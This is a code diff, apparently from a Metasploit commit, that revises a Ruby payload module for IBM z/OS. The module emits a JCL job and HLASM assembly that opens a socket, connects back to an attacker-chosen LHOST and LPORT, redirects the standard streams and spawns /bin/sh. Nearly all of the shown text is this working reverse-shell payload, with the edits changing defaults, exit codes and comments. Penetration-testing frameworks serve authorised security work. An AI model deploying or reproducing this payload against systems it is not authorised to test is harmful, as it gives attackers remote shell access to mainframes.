1313require 'msf/base/sessions/command_shell_options'
1414
1515module MetasploitModule
16- CachedSize = 9973
16+ CachedSize = 8993
1717 include Msf ::Payload ::Single
1818 include Msf ::Payload ::Mainframe
1919 include Msf ::Sessions ::CommandShellOptions
@@ -41,7 +41,7 @@ def initialize(info = {})
4141 register_options (
4242 [
4343 # need these defaulted so we can manipulate them in command_string
44- Opt ::LHOST ( '127 .0.0.1 ' ) ,
44+ Opt ::LHOST ( '0 .0.0.0 ' ) ,
4545 Opt ::LPORT ( 4444 ) ,
4646 OptString . new ( 'ACTNUM' , [ true , "Accounting info for JCL JOB card" , "MSFUSER-ACCTING-INFO" ] ) ,
4747 OptString . new ( 'PGMNAME' , [ true , "Programmer name for JCL JOB card" , "programmer name" ] ) ,
@@ -81,15 +81,13 @@ def command_string
8181
8282 jcl_jobcard +
8383 "//**************************************/\n " \
84- "//* SPAWN REV SHELL FOR MSF MODULE */\n " \
84+ "//* SPAWN REVERSE SHELL FOR MSF MODULE*/\n " \
8585 "//**************************************/\n " \
86- "//* final load module name here\n " \
87- "//SET1 SET PGMN=SPAWNREV\n " \
8886 "//*\n " \
8987 "//STEP1 EXEC PROC=ASMACLG,PARM.L=(CALL)\n " \
9088 "//L.SYSLIB DD DSN=SYS1.CSSLIB,DISP=SHR\n " \
9189 "//C.SYSIN DD *,DLM=ZZ\n " \
92- " TITLE 'spaw rev shell non exec '\n " \
90+ " TITLE 'Spanws Reverse Shell '\n " \
9391 "SPAWNREV CSECT\n " \
9492 "SPAWNREV AMODE 31\n " \
9593 "SPAWNREV RMODE ANY\n " \
@@ -99,44 +97,35 @@ def command_string
9997 " USING *,15\n " \
10098 "@SETUP0 B @SETUP1\n " \
10199 " DROP 15\n " \
102- " DS 0H # half word boundary\n " \
103- "@SETUP1 STM 14,12,12(13) # save our registers\n " \
104- " LR 2,13 # callers sa\n " \
105- " LR 8,15 # pgm base in R8\n " \
106- " USING @SETUP0,8 # R8 for base addressability\n " \
100+ " DS 0H # half word boundary\n " \
101+ "@SETUP1 STM 14,12,12(13) # save our registers\n " \
102+ " LR 2,13 # callers sa\n " \
103+ " LR 8,15 # pgm base in R8\n " \
104+ " USING @SETUP0,8 # R8 for base addressability\n " \
107105 "*************************************\n " \
108106 "* set up data area / addressability *\n " \
109107 "*************************************\n " \
110- "*\n " \
111- " L 0,@DYNSIZE # len of variable area\n " \
112- " GETMAIN RU,LV=(0) # get data stg, len R0\n " \
113- " LR 13,1 # data address\n " \
114- " USING @DATA,13 # addressability for data area\n " \
115- "* XC @DATA(@DATA#LEN),@DATA # zero data area\n " \
116- " ST 2,@BACK # store callers sa address\n " \
117- " ST 13,8(,2) # store our data addr\n " \
118- "*************************************\n " \
119- "* set up INHE area / addressability *\n " \
120- "*************************************\n " \
121- "*\n " \
122- "* L 0,=A(INHE#LENGTH) # length of INHE macro\n " \
123- "* GETMAIN RU,LV=(0) # get stg for inhe macro\n " \
124- "* ST 1,@CONSA # save addr inhe macro stg\n " \
125- "* LR 5,1 # R5 has INHE struct address\n " \
126- "* USING INHE,5 # addressability for INHE\n " \
127- " DS 0H # halfword boundaries\n " \
108+ " L 0,@DYNSIZE # len of variable area\n " \
109+ " GETMAIN RU,LV=(0) # get data stg, len R0\n " \
110+ " LR 13,1 # data address\n " \
111+ " USING @DATA,13 # addressability for data area\n " \
112+ " ST 2,@BACK # store callers sa address\n " \
113+ " ST 13,8(,2) # store our data addr\n " \
114+ " DS 0H # halfword boundaries\n " \
115+ "\n " \
128116 "***********************************************************************\n " \
129117 "* BPX1SOC set up socket - inline *\n " \
130118 "***********************************************************************\n " \
131119 " CALL BPX1SOC, X\n " \
132120 " (DOM,TYPE,PROTO,DIM,CLIFD, X\n " \
133121 " RTN_VAL,RTN_COD,RSN_COD),VL,MF=(E,PLIST)\n " \
122+ "\n " \
134123 "*******************************\n " \
135124 "* chk return code, 0 or exit *\n " \
136125 "*******************************\n " \
137126 " LHI 15,2\n " \
138- " L 6 ,RTN_VAL\n " \
139- " CIB 6 ,0,7,EXITP # R6 not 0? Time to exit\n " \
127+ " L 7 ,RTN_VAL\n " \
128+ " CIB 7 ,0,7,EXITP # R7 not 0? Time to exit\n " \
140129 "\n " \
141130 "***********************************************************************\n " \
142131 "* BPX1CON (connect) connect to remote host - inline *\n " \
@@ -153,8 +142,8 @@ def command_string
153142 "* chk return code, 0 or exit *\n " \
154143 "*******************************\n " \
155144 " LHI 15,3\n " \
156- " L 6 ,RTN_VAL\n " \
157- " CIB 6 ,0,7,EXITP # R6 not 0? Time to exit\n " \
145+ " L 7 ,RTN_VAL\n " \
146+ " CIB 7 ,0,7,EXITP # R7 not 0? Time to exit\n " \
158147 "\n " \
159148 "*************************************************\n " \
160149 "* order of things to prep child pid *\n " \
@@ -172,9 +161,10 @@ def command_string
172161 "****************************************************\n " \
173162 "* chk return code here anything but -1 is ok *\n " \
174163 "****************************************************\n " \
175- " LHI 15,11 # exit code for this func\n " \
176- " L 7,RTN_VAL # set r7 to rtn val\n " \
177- " CIB 7,-1,8,EXITP # r6 = -1 exit\n " \
164+ " LHI 15,4 # exit code for this func\n " \
165+ " L 7,RTN_VAL # set r7 to rtn val\n " \
166+ " CIB 7,-1,8,EXITP # R7 = -1 exit\n " \
167+ "\n " \
178168 "*******************\n " \
179169 "***** STDOUT *****\n " \
180170 "*******************\n " \
@@ -186,9 +176,10 @@ def command_string
186176 "****************************************************\n " \
187177 "* chk return code here anything but -1 is ok *\n " \
188178 "****************************************************\n " \
189- " LHI 15,11 # exit code for this func\n " \
190- " L 7,RTN_VAL # set r7 to rtn val\n " \
191- " CIB 7,-1,8,EXITP # r6 = -1 exit\n " \
179+ " LHI 15,5 # exit code for this func\n " \
180+ " L 7,RTN_VAL # set r7 to rtn val\n " \
181+ " CIB 7,-1,8,EXITP # R7 = -1 exit\n " \
182+ "\n " \
192183 "*******************\n " \
193184 "***** STDERR *****\n " \
194185 "*******************\n " \
@@ -200,14 +191,13 @@ def command_string
200191 "****************************************************\n " \
201192 "* chk return code here anything but -1 is ok *\n " \
202193 "****************************************************\n " \
203- " LHI 15,11 # exit code for this func\n " \
204- " L 7,RTN_VAL # set r7 to rtn val\n " \
205- " CIB 7,-1,8,EXITP # r7 = -1 exit\n " \
194+ " LHI 15,6 # exit code for this func\n " \
195+ " L 7,RTN_VAL # set r7 to rtn val\n " \
196+ " CIB 7,-1,8,EXITP # R7 = -1 exit\n " \
197+ "\n " \
206198 "***********************************************************************\n " \
207199 "* BP1SPN (SPAWN) execute shell '/bin/sh' *\n " \
208200 "***********************************************************************\n " \
209- "******\n " \
210- "******\n " \
211201 " XC INHE(INHE#LENGTH),INHE # clear inhe structure\n " \
212202 " XI INHEFLAGS0,INHESETPGROUP\n " \
213203 " SPACE ,\n " \
@@ -220,46 +210,35 @@ def command_string
220210 " (EXCMDL,EXCMD,EXARGC,EXARGLL,EXARGL,EXENVC,EXENVLL, X\n " \
221211 " EXENVL,FDCNT,FDLST,=A(INHE#LENGTH),INHE,RTN_VAL, X\n " \
222212 " RTN_COD,RSN_COD),VL,MF=(E,PLIST)\n " \
223- " LHI 15,12 # exit code for this func\n " \
224- " L 7,RTN_VAL # set r7 to rtn val\n " \
225- " L 6,RTN_COD\n " \
226- " L 5,RSN_COD\n " \
227- " CIB 7,-1,8,EXITP # r7 = -1 exit\n " \
213+ " LHI 15,7 # exit code for this func\n " \
214+ " L 7,RTN_VAL # set r7 to rtn val\n " \
215+ " CIB 7,-1,8,EXITP # R7 = -1 exit\n " \
228216 "\n " \
229217 "****************************************************\n " \
230- "* cleanup & exit *\n " \
231- "* preload R15 with exit code *\n " \
218+ "* cleanup & exit preload R15 with exit code *\n " \
232219 "****************************************************\n " \
233- "GOODX XR 15,15 # 4 FOR rc\n " \
234- "* L 0,=A(INHE#LENGTH)\n " \
235- "* L 5,@INHEA\n " \
236- "* DROP 5\n " \
237- "* FREEMAIN RU,LV=(0),A=(5) #free storage\n " \
220+ " XR 15,15 # 4 FOR rc\n " \
238221 "EXITP L 0,@DYNSIZE\n " \
239222 " LR 1,13\n " \
240223 " L 13,@BACK\n " \
241224 " DROP 13\n " \
242- " FREEMAIN RU,LV=(0),A=(1) #free storage\n " \
243- " XR 15,15\n " \
244- " L 14,12(,13) # load R14\n " \
245- " LM 0,12,20(13) # load 0-12\n " \
246- " BSM 0,14 # branch to caller\n " \
225+ " FREEMAIN RU,LV=(0),A=(1) # Free storage\n " \
226+ " L 14,12(,13) # load R14\n " \
227+ " LM 0,12,20(13) # load 0-12\n " \
228+ " BSM 0,14 # branch to caller\n " \
247229 "\n " \
248- "**********************\n " \
249- "* *\n " \
250- "* Constant Sections *\n " \
251- "* *\n " \
252- "**********************\n " \
253- " DS 0F # constants full word boundary\n " \
230+ "****************************************************\n " \
231+ "* Constants and Variables *\n " \
232+ "****************************************************\n " \
233+ " DS 0F # constants full word boundary\n " \
254234 "F_STDI EQU 0\n " \
255235 "F_STDO EQU 1\n " \
256236 "F_STDE EQU 2\n " \
257237 "*************************\n " \
258- "* Socket conn variables * # functions used by pgm\n " \
238+ "* Socket conn variables * # functions used by pgm\n " \
259239 "*************************\n " \
260240 "CONNSOCK DC XL2'#{ lport } \n " \
261241 "CONNADDR DC XL4'#{ lhost } \n " \
262- "BACKLOG DC F'1' # 1 byte backlog\n " \
263242 "DOM DC A(AF_INET) # AF_INET = 2\n " \
264243 "TYPE DC A(SOCK#_STREAM) # stream = 1\n " \
265244 "PROTO DC A(IPPROTO_IP) # ip = 0\n " \
@@ -278,11 +257,8 @@ def command_string
278257 "EXENVC DC F'0' # env var count\n " \
279258 "EXENVL DC F'0' # env var arg list addr\n " \
280259 "EXENVLL DC F'0' # env var arg len addr\n " \
281- "EXITRA DC F'0' # exit routine addr\n " \
282- "EXITPLA DC F'0' # exit rout parm list addr\n " \
283260 "FDCNT DC F'0' # field count s/b 0\n " \
284261 "FDLST DC F'0' # field list addr s/b 0\n " \
285- "MYLEN DC F'0'\n " \
286262 "TVER DC AL2(INHE#VER)\n " \
287263 "TLEN DC AL2(INHE#LENGTH)\n " \
288264 " SPACE ,\n " \
@@ -297,22 +273,14 @@ def command_string
297273 "RTN_COD DS F # return code\n " \
298274 "RSN_COD DS F # reason code\n " \
299275 "CLIFD DS F # client fd\n " \
300- "*********************\n " \
301- "* Return value vars *\n " \
302- "*********************\n " \
303- "@SAVE00 DS 0D\n " \
304- " DS A\n " \
305276 "@BACK DS A\n " \
306- "@FORWARD DS A\n " \
307- " DS 15A\n " \
308- "@INHEA DS A\n " \
309277 "*\n " \
310278 " BPXYSOCK LIST=NO,DSECT=NO\n " \
311279 " BPXYFCTL LIST=NO,DSECT=NO\n " \
312280 " BPXYINHE LIST=NO,DSECT=NO\n " \
313281 "@ENDYN EQU *\n " \
314282 "@DATA#LEN EQU *-@DATA\n " \
315- " BPXYCONS LIST=YES \n " \
283+ " BPXYCONS LIST=NO \n " \
316284 " END SPAWNREV\n " \
317285 "ZZ\n " \
318286 "//*\n "
0 commit comments